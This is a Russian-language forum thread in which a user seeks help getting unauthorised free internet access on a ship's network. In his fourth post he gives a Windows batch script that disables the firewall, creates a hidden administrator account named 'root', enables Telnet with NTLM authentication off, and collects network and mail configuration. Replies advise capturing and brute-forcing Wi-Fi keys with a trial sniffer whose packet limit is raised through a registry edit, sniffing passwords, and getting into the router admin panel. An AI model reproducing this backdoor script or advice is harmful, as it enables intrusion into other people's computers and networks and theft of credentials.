помогите с дровами для Atheros AR5007EG Wireless Networ

Discussion in 'Безопасность и Анонимность' started by Super_Lamer, 16 Jun 2011.

  1. Super_Lamer

    Super_Lamer New Member

    Joined:
    12 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Есть ноут и на нем карта
    Atheros AR5007EG Wireless Networ
    пробую юзать aircrack но он пишет что не поддержует мой адаптер.... пробовал ставить двое дров но без результат ... я работаю далеко сейчас и мне жизненно необходимо сделать себе халявные нет! пожалуйста напишите в приват что лучше сделать или какие дрова лучше качнуть.... или тупо покупать pce карту....
     
  2. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    560
    Likes Received:
    133
    Reputations:
    34
    http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
    тут написано, что атерос работает
    качай какой-нибудь старый CommView, где в триале стоит лимит на пакеты, правь реестр на 500000 пакетов (должно хватить) лови и бруть.
     
    1 person likes this.
  3. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,106
    Likes Received:
    490
    Reputations:
    285
    дк. ты удали дрова поставь комвивер , затесть если не работает поставь дрова .. вроде так
     
  4. Super_Lamer

    Super_Lamer New Member

    Joined:
    12 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    работаю в море ) тут на некоторых машинах есть доступ на мыло(не лимитированный, пробовал ставить их мак и ип но не спасает) и походу в инет... хочу скинуть на флеху батник и проксю которая бы установилась и настроилась за 3 сек...
    пока вот что накидал... подскажи проксю под XP самуую простую которую можно было бы установить и настроить из Bat файла... если можно то ссылки... лазить в инете нет возможности....РЕБЯТА ПОМОГИТЕ!!
    (ДОПОЛНИТЕ КОД) также на компе админа запущен дед .... пробовал tcpdump ом под виндой что то поймать посмотреть, ну что то он не фига вообще не ловит... есть какой актуальный снифер с кряком??(в инете не нашел, киньте линк) ... я могу ноут оставить хоть на 2 дня пусть ловит пассы

    netsh firewall set opmode disable
    net user root root /add
    net localgroup Administrators root /add
    reg add "hklm\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t reg_dword /d 00000000 /f
    sc config tlntsvr start= auto
    tlntadmn config port=22 sec=-NTLM
    net start Telnet
    ipconfig /all>>ip.txt
    netsh diag show ieproxy>>ie.txt
    netsh diag show mail>>mail.txt
    systeminfo>>sinfo.txt

    пожалуйста не удаляйте топ!!!
     
    #4 Super_Lamer, 18 Jun 2011
    Last edited: 19 Jun 2011
  5. Super_Lamer

    Super_Lamer New Member

    Joined:
    12 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    почему tcpdump нечего не ловит в wifi сети ?
    пробовал переставлять дрова но не спасло...
     
  6. Super_Lamer

    Super_Lamer New Member

    Joined:
    12 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Здрасте.. есть сетка в которой доступ разрешен на 5 сайтов .... бесплатно типо... вопрос в следующем как можно зайходить на остальные сайты... ? как скорее всего там реализована система проверки?
     
  7. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,106
    Likes Received:
    490
    Reputations:
    285
    ну тут тема такая на роутере править нада доступ то с него дают , я так делал ...
    пробую в админку залесть
    юзать сниферы итп
     
Loading...